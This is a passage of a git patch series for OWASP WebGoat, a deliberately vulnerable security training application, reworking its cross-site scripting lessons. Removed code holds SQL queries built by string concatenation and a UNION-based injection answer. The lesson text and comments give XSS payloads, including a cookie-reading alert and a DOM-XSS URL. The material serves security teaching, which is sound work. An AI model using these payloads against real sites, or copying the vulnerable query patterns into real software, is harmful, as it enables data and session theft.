-			t.append("<br />");
-			results.beforeFirst();
-		
-			while (results.next())
-			{
-		
-				for (int i = 1; i < (numColumns + 1); i++)
-				{
-					t.append(results.getString(i));
-					t.append(", ");
-				}
-		
-				t.append("<br />");
-			}
-		
-		}
-		else
-		{
-			t.append ("Query Successful; however no data was returned from this query.");
-		}
-		
-		t.append("</p>");
-		return (t.toString());
-    }
-//
-//    protected Element parameterizedQuery(WebSession s)
-//    {
-//        ElementContainer ec = new ElementContainer();
-//
-//        ec.addElement(getLabelManager().get("StringSqlInjectionSecondStage"));
-//        if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
-//        {
-//            getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
-//            return (injectableQuery(s));
-//        }
-//
-//        ec.addElement(new BR());
-//
-//        try
-//        {
-//            Connection connection = DatabaseUtilities.getConnection(s);
-//
-//            ec.addElement(makeAccountLine(s));
-//
-//            String query = "SELECT * FROM user_data WHERE last_name = ?";
-//            ec.addElement(new PRE(query));
-//
-//            try
-//            {
-//                PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-//                                                                            ResultSet.CONCUR_READ_ONLY);
-//                statement.setString(1, accountName);
-//                ResultSet results = statement.executeQuery();
-//
-//                if ((results != null) && (results.first() == true))
-//                {
-//                    ResultSetMetaData resultsMetaData = results.getMetaData();
-//                    ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
-//                    results.last();
-//
-//                    // If they get back more than one user they succeeded
-//                    if (results.getRow() >= 6)
-//                    {
-//                        makeSuccess(s);
-//                    }
-//                }
-//                else
-//                {
-//                    ec.addElement(getLabelManager().get("NoResultsMatched"));
-//                }
-//            } catch (SQLException sqle)
-//            {
-//                ec.addElement(new P().addElement(sqle.getMessage()));
-//            }
-//        } catch (Exception e)
-//        {
-//            s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
-//            e.printStackTrace();
-//        }
-//
-//        return (ec);
-//    }
-//
-//    protected Element makeAccountLine(WebSession s)
-//    {
-//        ElementContainer ec = new ElementContainer();
-//        ec.addElement(new P().addElement(getLabelManager().get("EnterLastName")));
-//
-//        accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
-//        Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
-//        ec.addElement(input);
-//
-//        Element b = ECSFactory.makeButton(getLabelManager().get("Go!"));
-//        ec.addElement(b);
-//
-//        return ec;
-//
-//    }
-
- */
-
 }
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6a.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6a.java
index 67b2ab912..4e9e2a372 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6a.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6a.java
@@ -3,7 +3,15 @@ package org.owasp.webgoat.plugin;
 
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.UserSessionData;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
 
+import java.io.IOException;
 
 
 /***************************************************************************************************
@@ -38,176 +46,19 @@ import org.owasp.webgoat.assignments.AssignmentPath;
  */
 @AssignmentPath("/CrossSiteScripting/attack6a")
 public class CrossSiteScriptingLesson6a extends AssignmentEndpoint {
-/*
-	@RequestMapping(method = RequestMethod.POST)
-	public @ResponseBody AttackResult completed(@RequestParam String userid_6a, HttpServletRequest request) throws IOException {
-		return injectableQuery(userid_6a);
-		// The answer: Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+    @Autowired
+    UserSessionData userSessionData;
 
-	}
+    @RequestMapping(method = RequestMethod.POST)
+    public @ResponseBody
+    AttackResult completed(@RequestParam String DOMTestRoute)  throws IOException {
 
-    protected AttackResult injectableQuery(String accountName)
-    {
-        try
-        {
-            Connection connection = DatabaseUtilities.getConnection(getWebSession());
-            String query = "SELECT * FROM user_data WHERE last_name = '" + accountName + "'";
-
-            try
-            {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                    ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
-
-                if ((results != null) && (results.first() == true))
-                {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                	StringBuffer output = new StringBuffer();
-
-                    output.append(writeTable(results, resultsMetaData));
-                    results.last();
-
-                    // If they get back more than one user they succeeded
-                    if (results.getRow() >= 6)
-                    {
-                    	return trackProgress(AttackResult.success("You have succeed: " + output.toString()));
-                   } else {
-                	   return trackProgress(AttackResult.failed("You are close, try again. " + output.toString()));
-                   }
-                    
-                }
-                else
-                {
-                	return trackProgress(AttackResult.failed("No Results Matched. Try Again. "));
-
-                }
-            } catch (SQLException sqle)
-            {
-            	
-            	return trackProgress(AttackResult.failed(sqle.getMessage()));
-            }
-        } catch (Exception e)
-        {
-        	e.printStackTrace();
-        	return trackProgress(AttackResult.failed( "ErrorGenerating" + this.getClass().getName() + " : " + e.getMessage()));
+        if (DOMTestRoute.equals("start.mvc#test/")) {
+            //return trackProgress()
+            return trackProgress(success().feedback("xss-reflected-6a-success").build());
+        } else {
+            return trackProgress(failed().feedback("xss-reflected-6a-failure").build());
         }
     }
-    
-    public String writeTable(ResultSet results, ResultSetMetaData resultsMetaData) throws IOException,
-	SQLException 
-    {
-		int numColumns = resultsMetaData.getColumnCount();
-		results.beforeFirst();
-		StringBuffer t = new StringBuffer();
-		t.append("<p>");
-	
-		if (results.next())
-		{
-			for (int i = 1; i < (numColumns + 1); i++)
-			{
-				t.append(resultsMetaData.getColumnName(i));
-				t.append(", ");
-			}
-		
-			t.append("<br />");
-			results.beforeFirst();
-		
-			while (results.next())
-			{
-		
-				for (int i = 1; i < (numColumns + 1); i++)
-				{
-					t.append(results.getString(i));
-					t.append(", ");
-				}
-		
-				t.append("<br />");
-			}
-		
-		}
-		else
-		{
-			t.append ("Query Successful; however no data was returned from this query.");
-		}
-		
-		t.append("</p>");
-		return (t.toString());
-    }
-//
-//    protected Element parameterizedQuery(WebSession s)
-//    {
-//        ElementContainer ec = new ElementContainer();
-//
-//        ec.addElement(getLabelManager().get("StringSqlInjectionSecondStage"));
-//        if (s.getParser().getRawParameter(ACCT_NAME, "YOUR_NAME").equals("restart"))
-//        {
-//            getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
-//            return (injectableQuery(s));
-//        }
-//
-//        ec.addElement(new BR());
-//
-//        try
-//        {
-//            Connection connection = DatabaseUtilities.getConnection(s);
-//
-//            ec.addElement(makeAccountLine(s));
-//
-//            String query = "SELECT * FROM user_data WHERE last_name = ?";
-//            ec.addElement(new PRE(query));
-//
-//            try
-//            {
-//                PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-//                                                                            ResultSet.CONCUR_READ_ONLY);
-//                statement.setString(1, accountName);
-//                ResultSet results = statement.executeQuery();
-//
-//                if ((results != null) && (results.first() == true))
-//                {
-//                    ResultSetMetaData resultsMetaData = results.getMetaData();
-//                    ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
-//                    results.last();
-//
-//                    // If they get back more than one user they succeeded
-//                    if (results.getRow() >= 6)
-//                    {
-//                        makeSuccess(s);
-//                    }
-//                }
-//                else
-//                {
-//                    ec.addElement(getLabelManager().get("NoResultsMatched"));
-//                }
-//            } catch (SQLException sqle)
-//            {
-//                ec.addElement(new P().addElement(sqle.getMessage()));
-//            }
-//        } catch (Exception e)
-//        {
-//            s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
-//            e.printStackTrace();
-//        }
-//
-//        return (ec);
-//    }
-//
-//    protected Element makeAccountLine(WebSession s)
-//    {
-//        ElementContainer ec = new ElementContainer();
-//        ec.addElement(new P().addElement(getLabelManager().get("EnterLastName")));
-//
-//        accountName = s.getParser().getRawParameter(ACCT_NAME, "Your Name");
-//        Input input = new Input(Input.TEXT, ACCT_NAME, accountName.toString());
-//        ec.addElement(input);
-//
-//        Element b = ECSFactory.makeButton(getLabelManager().get("Go!"));
-//        ec.addElement(b);
-//
-//        return ec;
-//
-//    }
-
-*/
 
 }
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6b.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6b.java
deleted file mode 100644
index d58cbe90a..000000000
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6b.java
+++ /dev/null
@@ -1,95 +0,0 @@
-
-package org.owasp.webgoat.plugin;
-
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentPath;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestMethod;
-import org.springframework.web.bind.annotation.RequestParam;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-@AssignmentPath("/CrossSiteScripting/attack6b")
-public class CrossSiteScriptingLesson6b extends AssignmentEndpoint {
-
-	@RequestMapping(method = RequestMethod.POST)
-	public @ResponseBody AttackResult completed(@RequestParam String userid_6b, HttpServletRequest request) throws IOException {
-	    if (userid_6b.toString().equals(getPassword())) {
-	        return trackProgress(success().build());
-	    } else {
-	        return trackProgress(failed().build());
-	    }
-	}
-
-    protected String getPassword()
-    {
-    	
-    	String password="dave";
-        try
-        {
-            Connection connection = DatabaseUtilities.getConnection(getWebSession());
-            String query = "SELECT password FROM user_system_data WHERE user_name = 'dave'";
-            
-            try
-            {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                    ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
-
-                if ((results != null) && (results.first() == true))
-                {
-                    password = results.getString("password");
-                }
-            } catch (SQLException sqle)
-            {
-            	sqle.printStackTrace();
-            	// do nothing
-            }
-        } catch (Exception e)
-        {
-        	e.printStackTrace();
-        	// do nothing
-        }
-        return (password);
-    }
-}
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
index 0acb4e38b..c4ceea5b4 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/DOMCrossSiteScripting.java
@@ -19,17 +19,17 @@ public class DOMCrossSiteScripting extends AssignmentEndpoint {
     @RequestMapping(method = RequestMethod.POST)
     public @ResponseBody
     AttackResult completed(@RequestParam Integer param1,
-                           @RequestParam Integer param2, HttpServletRequest request)
-            throws IOException {
-        
+                           @RequestParam Integer param2, HttpServletRequest request)  throws IOException {
         if (param1 == 42 && param2 == 24 && request.getHeader("webgoat-requested-by").equals("dom-xss-vuln")) {
+            System.out.println("DOM-XSS successful");
             return trackProgress(success().build());
         } else {
             return trackProgress(failed().build());
         }
     }
 }
-
+// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
 
 
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
index 4872350dc..884674f49 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/html/CrossSiteScripting.html
@@ -78,7 +78,7 @@
 				<!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
 				<!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
 				<form class="attack-form" accept-charset="UNKNOWN" 
-					method="POST" name="form"
+					method="GET" name="xss-5a"
 					action="/WebGoat/CrossSiteScripting/attack5a"
 					enctype="application/json;charset=UTF-8">
 					<hr width="90%" />
@@ -161,11 +161,27 @@
 			<div class="attack-output"></div>
 			<!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
 		</div>
+
 	</div>
+
+    <div class="lesson-page-wrapper">
+        <div class="adoc-content" th:replace="doc:CrossSiteScripting_content5b.adoc"></div>
+        <div class="attack-container">
+            <form class="attack-form" accept-charset="UNKNOWN"
+                  method="POST" name="xss-5b"
+                  action="/WebGoat/CrossSiteScripting/attack5b"
+                  enctype="application/json;charset=UTF-8">
+                <input size="4" value="" name="isReflectedXSS" type="text" />
+                <input type="submit" name="reflectedXssSubmit" value="Submit"/>
+            </form>
+            <!-- do not remove the two following div's, this is where your feedback/output will land -->
+            <div class="attack-feedback"></div>
+            <div class="attack-output"></div>
+            <!-- ... of course, you can move them if you want to, but that will not look consistent to other lessons -->
+        </div>
+    </div>
+
 	<div class="lesson-page-wrapper">
-        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
-		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
-		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
 		<div class="adoc-content" th:replace="doc:CrossSiteScripting_content6.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
@@ -180,18 +196,11 @@
                 <!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
                 <!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
 				<form class="attack-form" accept-charset="UNKNOWN" 
-					method="POST" name="form"
+					method="POST" name="DOMTestRoute"
 					action="/WebGoat/CrossSiteScripting/attack6a"
 					enctype="application/json;charset=UTF-8">
-					<table>
-						<tr>
-							<td>Name:</td>
-							<td><input name="userid_6a" value="" type="TEXT" /></td>
-							<td><input
-							name="Get Account Info" value="Get Account Info" type="SUBMIT"/></td>
-							<td></td>
-						</tr>
-					</table>
+					<input name="DOMTestRoute" value="" type="TEXT" />
+                    <input name="SubmitTestRoute" value="Submit" type="SUBMIT"/>
 				</form>
 			<!-- do not remove the two following div's, this is where your feedback/output will land -->
 			<div class="attack-feedback"></div>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content1.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content1.adoc
index 694dc74f1..4fae247b7 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content1.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content1.adoc
@@ -1,14 +1,21 @@
 == What is XSS
 
-NEED DEFINITION.
+Cross-site script (also commonly known as XSS) is a vulnerability/flaw that combines ...
+# the allowance of html/script tags as input that are ...
+# rendred into a browser without encoding or sanitization
 
-==== Cross site scripting (XSS) is the most prevalent and pernicious web application security issue
+=== Cross site scripting (XSS) is the most prevalent and pernicious web application security issue
 
-==== XSS flaws occur whenever an application takes user originated data and sends it to a web browser without validation or encoding
+While there is a simple well-known defense for this attack, there are still many instances of it on the web.  In terms of fixing it,
+coverage of fixes also tends to be a problem. We'll talk more about the defense in a little bit.
 
-=== XSS allows attackers to execute script in the victim’s browser and take over the user’s browser using scripting malware
+=== XSS has a significant impact
 
-==== Examples:
+Especially as 'Rich Internet Applications' are more and more common place, privileged function calls linked to via javascript may be compromised.
+And if not properly protected, sensitive data (such as your authentication cookies) can be stolen and used for someone else's purpose.
+
+
+==== Quick examples:
 * From the browser address bar (chrome, Firefox)
 +
 ----
@@ -22,4 +29,5 @@ javascript:alert(document.cookie);
 ----
 
 == Try It!  Using Chrome or Firefox 
-Type in `javascript:alert(document.cookie);` in the URL bar.  If you /cut/paste you'll need to add the `javascript:` back in.  Try it on a different tab.
+Type in `javascript:alert(document.cookie);` in the URL bar.  *NOTE:* If you /cut/paste you'll need to add the `javascript:` back in.
+Try it on a different tab (with WebGoat open in that tab).
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content3.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content3.adoc
index e1ccb70f3..051672d77 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content3.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content3.adoc
@@ -11,7 +11,7 @@
 * Insertion of hostile and inappropriate content
 +
 ----
-<img src=“http://pornsite.com/image.jpg/>
+<img src=“http://malicious.site.com/image.jpg/>
 “>GoodYear recommends buying BridgeStone tires…
 ----
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content4.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content4.adoc
index 6fbfabcd4..b98ec68d5 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content4.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content4.adoc
@@ -2,13 +2,14 @@
 
 === Reflected
 * Malicious content from a user request is displayed to the user in a web browser
-* Malicious content is written into the page via server code
+* Malicious content is written into the page after from server response
 * Social engineering is required
+* Runs with browser privileges inherited from user in browser
 
-=== Local: DOM-based
+=== DOM-based (also technically reflected)
 * Malicious content from a user request is used by client-side scripts to write HTML to it own page
 * Similar to reflected XSS 
-* Runs with browser privileges
+* Runs with browser privileges inherited from user in browser
 
 === Stored or Persistent
 * Malicious content is stored on the server ( in a database, file system, or other object ) and later displayed to users in a web browser
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5a.adoc
index 2e1e65ee2..795e3e450 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5a.adoc
@@ -2,5 +2,7 @@
 
 Identify which field is susceptible to XSS
 
-It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it. 
+It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response.
+In a reflected XSS attack, an attacker can craft a URL with the attack script and post it to another website, email it, or otherwise get a victim to click on it.
 
+Make sure to include in your attack payload "<script>alert('my javascript here')</script>".
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5b.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5b.adoc
index f4e3b0570..477752127 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5b.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5b.adoc
@@ -1,4 +1,5 @@
 == Was it Really Reflected XSS?
 
-Now, was the last attack truly reflected XSS?
+You should have been able to execute script with the last example. Was it truly reflected XSS?
+
 
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5c.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5c.adoc
new file mode 100644
index 000000000..ffc47194a
--- /dev/null
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5c.adoc
@@ -0,0 +1,9 @@
+== Was it Really Reflected XSS?
+
+The last example was not truly reflected XSS ... Why you say?
+# Can you execute it by changing the URL? (No)
+# If you do follow the actual payload in a new tab, does it execute the script? (No ... go ahead and give it a try)
+
+The reason for #2 is that the response type
+
+
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6.adoc
index eaa6c8884..1445c3baf 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6.adoc
@@ -1,10 +1,12 @@
 == DOM-Based XSS Scenario
 
+DOM-based XSS is similar to reflected.  The difference is that the payload will never go to the server, but will only ever be processed by the client.
+
 * Attacker sends a malicious URL to victim 
-* Victim clicks on the link that loads malicious web page
-* The malicious web page's JavaScript opens a local web page on the victims machine that contains an attack
-* The local page executes attack in the computer’s local zone
+* Victim clicks on the link
+* That link may load a malicious web page or a web page they use (are logged into?) that has a vulnerable route/handler
+* If it's a  malicious web page, it may use it's own JavaScript to attack another page/url with a vulnerable route/handler
+* The vulnerable page renders the payload and executes attack in the user's context on that page/site
 * Attacker’s malicious script may run commands with the privileges of local account
 
-*Victim does not realize attack occurred*
-
+*Victim does not realize attack occurred* ... Malicious attackers don't use &lt;script&gt;alert('xss')&lt;/ script&gt;
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
index 1726ff547..9d4ce0689 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content6a.adoc
@@ -1,3 +1,12 @@
 == Try It!   DOM-Based XSS
 
-Need A Lesson
+For this, you'll want to look for some 'test' code in the route handlers (javascript/backbone). Sometimes, test code gets left in.
+(Often times test code is very simple and lacks security or any quality controls!).
+
+Your objective is to find the route and exploit it. First though ... what is the base route? As an example, look at the URL for this lesson ...
+it should look something like /WebGoat/start.mvc#lesson/CrossSiteScripting.lesson/5 (although maybe slightly different). The 'base route' in this case is:
+*start.mvc#lesson/*
+
+The *CrossSiteScripting.lesson/5* after that are parameters that are processed by javascript route handler.
+
+So, what is test route for this test code?
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
index 2b0bc8c70..af10c440a 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/cross-site-scripting/src/main/resources/plugin/i18n/WebGoatLabels.properties
@@ -1,10 +1,10 @@
-#StringSqlInjection.java
-StringSqlInjectionSecondStage=Now that you have successfully performed an SQL injection, try the same type of attack on a parameterized query.  Restart the lesson if you wish to return to the injectable query.
-EnterLastName=Enter your last name:
-NoResultsMatched=No results matched.  Try Again.
-SqlStringInjectionHint1=The application is taking your input and inserting it at the end of a pre-formed SQL command.
-SqlStringInjectionHint2=This is the code for the query being built and issued by WebGoat:<br><br> "SELECT * FROM user_data WHERE last_name = "accountName"
-SqlStringInjectionHint3=Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. Try appending a SQL statement that always resolves to true
-SqlStringInjectionHint4=Try entering [ smith' OR '1' = '1 ].
+# XSS success, failure messages and hints
+xss-reflected-5a-success=well done, but alerts aren't very impressive are they? Please continue.
+xss-reflected-5a-failure=Try again. We do want to see this specific javascript (in case you are trying to do something more fancy)
+xss-reflected-5b-success=Correct ... because <ul><li>The script was not triggered by the URL/QueryString</li><li>Even if you use the attack URL in a new tab, it won't execute (becuase of response type). Try it if you like.</li></ul>
+xss-reflected-5b-failure=Nope, pretty easy to guess now though.
+xss-reflected-6a-success=Correct! Now, see if you can send in an exploit to that route in the next assignment.
+xss-reflected-6a-failure=No, look at the example. Check the GoatRouter.js file. It should be pretty easy to determine.
+xss.lesson1.failure=Are you sure? Try using a tab from a different site.
 
-xss.lesson1.failure=Are you sure? Try using a tab from a different site.
\ No newline at end of file
+#xss-reflected-5b-do5a-first=Do the reflected xss attack prior to this, then come back and answer this.
\ No newline at end of file

From d99a1d84489b409a1b81f4f89881b49fbcb7decc Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 14:53:23 -0500
Subject: [PATCH 07/10] temp. dep. mgmt resolution

---
 pom.xml                 |  5 +++++
 webgoat-lessons/pom.xml | 15 ++++++++++-----
 2 files changed, 15 insertions(+), 5 deletions(-)

diff --git a/pom.xml b/pom.xml
index b12027c09..d809fceeb 100644
--- a/pom.xml
+++ b/pom.xml
@@ -298,6 +298,11 @@
             <version>1.16.10</version>
             <scope>provided</scope>
         </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-exec</artifactId>
+            <version>1.3</version>
+        </dependency>
     </dependencies>
 
     <build>
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index 16cb5d107..541edca9b 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -32,11 +32,11 @@
             <scope>provided</scope>
             <type>jar</type>
         </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-exec</artifactId>
-            <version>1.3</version>
-        </dependency>
+        <!--<dependency>-->
+            <!--<groupId>org.apache.commons</groupId>-->
+            <!--<artifactId>commons-exec</artifactId>-->
+            <!--<version>1.3</version>-->
+        <!--</dependency>-->
         <dependency>
             <groupId>org.owasp.webgoat</groupId>
             <artifactId>webgoat-container</artifactId>
@@ -68,6 +68,11 @@
             <version>4.1.3.RELEASE</version>
             <scope>test</scope>
         </dependency>
+        <dependency>
+            <groupId>org.owasp.encoder</groupId>
+            <artifactId>encoder</artifactId>
+            <version>1.2</version>
+        </dependency>
     </dependencies>
     <dependencyManagement>
         <dependencies>

From ac6e8b59b7f480de66bdf55d481c2f0067010cb5 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 15:59:38 -0500
Subject: [PATCH 08/10] XSS updates

---
 .../webgoat/plugin/DOMCrossSiteScripting.java |   2 +-
 .../plugin/DOMCrossSiteScriptingFollowUp.java |  35 +++
 .../html/CrossSiteScripting.html              | 261 ++++++++++--------
 .../en/CrossSiteScripting_content6a.adoc      |   2 +-
 .../en/CrossSiteScripting_content6b.adoc      |   9 +
 .../plugin/i18n/WebGoatLabels.properties      |   2 +
 6 files changed, 193 insertions(+), 118 deletions(-)
